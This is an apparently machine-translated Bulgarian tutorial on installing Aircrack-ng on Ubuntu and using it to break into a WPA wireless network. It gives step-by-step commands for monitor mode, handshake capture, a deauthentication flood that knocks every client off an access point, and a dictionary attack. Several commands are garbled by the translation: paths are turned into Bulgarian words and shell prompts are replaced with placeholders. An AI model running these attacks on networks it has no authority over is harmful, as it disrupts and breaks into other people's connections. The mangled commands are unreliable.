самолет

Инсталирайте Aircrack-ng на Ubuntu

Инсталирайте Aircrack-ng на Ubuntu
Aircrack-ng е цял набор от инструменти за безжичен одит на сигурността. Може да се използва за наблюдение, тестване, пробиване или атака на безжични протоколи за сигурност като WEP, WPA, WPA2. Aircrack-ng е базиран на команден ред и е достъпен за Windows и Mac OS и други Unix базирани операционни системи. Suite Aircrack-ng съдържа много инструменти, използвани за различни цели, но тук ще разгледаме само някои важни инструменти, които се използват по-често при тестване на безжичната сигурност.

Airmon-ng

Airmon-ng се използва за управление на режими на безжична карта и за унищожаване на ненужни процеси, докато използвате aircrack-ng. За да подушите безжична връзка, трябва да смените безжичната си карта от управляван режим в режим на монитор и за тази цел се използва airmon-ng.

Airodump-ng

Airodump-ng е безжичен снифър, който може да улавя безжични данни от една или повече точки за безжичен достъп. Използва се за анализ на близките точки за достъп и за улавяне на ръкостискания.

Aireplay-ng

Aireplay-ng се използва за повторни атаки и като инжектор на пакети. Тя може да деаутентифицира потребителите от техните AP точки, за да заснеме ръкостискания.

Airdecap-ng

Airdecap-ng се използва за дешифриране на криптирани WEP, WPA / WPA2 безжични пакети с известен ключ.

Aircrack-ng

Aircrack-ng се използва за атака на безжични протоколи WPA / WEP, за да се намери ключът.

Инсталация

Aircrack-ng е лесен за инсталиране в Ubuntu с помощта на APT. Просто напишете следната команда и това ще инсталира всички инструменти, налични в Aircrack-ng suite.

sudo apt-get update
sudo apt-get install -y aircrack-ng

Употреба

В тази статия ще разгледаме набързо как да използваме aircrack-ng за разбиване на криптирана безжична мрежа (TR1CKST3R в този пример), за да намерим паролата.

На първо място, избройте всички налични безжични карти, свързани към вашия компютър, като използвате командата „iwconfig“.

За този урок ще използваме безжична карта с име „wlxc83a35cb4546“ (Това може да е различно във вашия случай). Сега унищожете всички процеси, работещи на безжична карта, като използвате airmon-ng.

[имейл защитен]: ~ $ sudo airmon-ng check kill
Стартирайте режима на монитор на 'wlxc83a35cb4546', като напишете
[имейл защитен]: ~ $ sudo airmon-ng start wlxc83a35cb4546

Сега, airmon-ng стартира режим на монитор на безжична карта, той ще се появи под различно име 'wlan0mon'. Стартирайте отново „iwconfig“, за да изброите подробности за безжичната връзка.

След това използвайте airodump-ng, за да видите близките точки за безжичен достъп и техните свойства.

[имейл защитен]: ~ $ sudo airodump-ng wlan0mon

Можете да стесните търсенето с помощта на филтри MAC (-bssid) и канал (-c). За да уловим ръкостискане (Ръкостискането съдържа криптирана парола), трябва да запазим нашите пакети някъде, използвайки опцията “-write”. Тип,

[имейл защитен]: ~ $ sudo airodump-ng --bssid 6C: B7: 49: FC: 62: E4
-c 11 wlan0mon --write / tmp / ръкостискане.шапка с козирка
--bssid: MAC адресът на точката за достъп
-c: Канал на точката за достъп [1-13]
--write: Съхранява уловени пакети на определено място

Сега трябва да премахнем удостоверяването на всяко устройство от тази точка за достъп, използвайки помощната програма Aireplay-ng. Пишете

[имейл защитен]: ~ $ sudo aireplay-ng -0 100 -a [MAC_ADD] wlan0mon

-a: Посочете MAC на точки за достъп за Aireplay-ng

-0: Посочете броя на пакетите за деаут за изпращане

След известно време всички устройства ще бъдат прекъснати от тази точка за достъп, когато се опитат да се свържат отново, стартирането на airodump-ng ще улови ръкостискането. Той ще се появи в горната част на стартирания airodump-ng.

Ръкостискането се съхранява в директорията '/ tmp /' и съдържа криптирана парола, която може да бъде принудена грубо офлайн с помощта на речник. За да разбием паролата, ще използваме Aircrack-ng. Тип

[имейл защитен]: ~ $ sudo aircrack-ng / tmp / ръкостискане.капачка-01.капачка -w
/ usr / share / wordlists / rockyou.текст
-w: Посочете местоположението на речника

Aircrack-ng ще премине през списъка с пароли и ако бъде намерен, ще покаже паролата, използвана като ключ.

В този случай aircrack-ng намери използваната парола „123456789“.

Сега спрете режима на монитор на безжична карта и рестартирайте мрежовия мениджър.

[имейл защитен]: ~ $ sudo airmon-ng stop wlan0mon
[имейл защитен]: ~ $ рестартиране на мрежовия мениджър на услугата sudo

Заключение

Aircrack-ng може да се използва за проверка на безжичната сигурност или за разбиване на забравени пароли. За тази цел има някои други подобни инструменти като Kismet, но aircrack-ng е по-известен с добрата си поддръжка, гъвкавост и широка гама от инструменти. Той има лесен за използване интерфейс на командния ред, който лесно може да бъде автоматизиран с помощта на всеки скриптов език като Python.

Как да инсталирате и играете Doom на Linux
Въведение в Doom Серията Doom възниква през 90-те години след пускането на оригиналния Doom. Това беше незабавен хит и от този момент нататък серията ...
Vulkan за потребители на Linux
С всяко ново поколение графични карти виждаме, че разработчиците на игри преместват границите на графичната вярност и се приближават една крачка до фо...
OpenTTD срещу Simutrans
Създаването на собствена транспортна симулация може да бъде забавно, релаксиращо и изключително примамливо. Ето защо трябва да сте сигурни, че изпробв...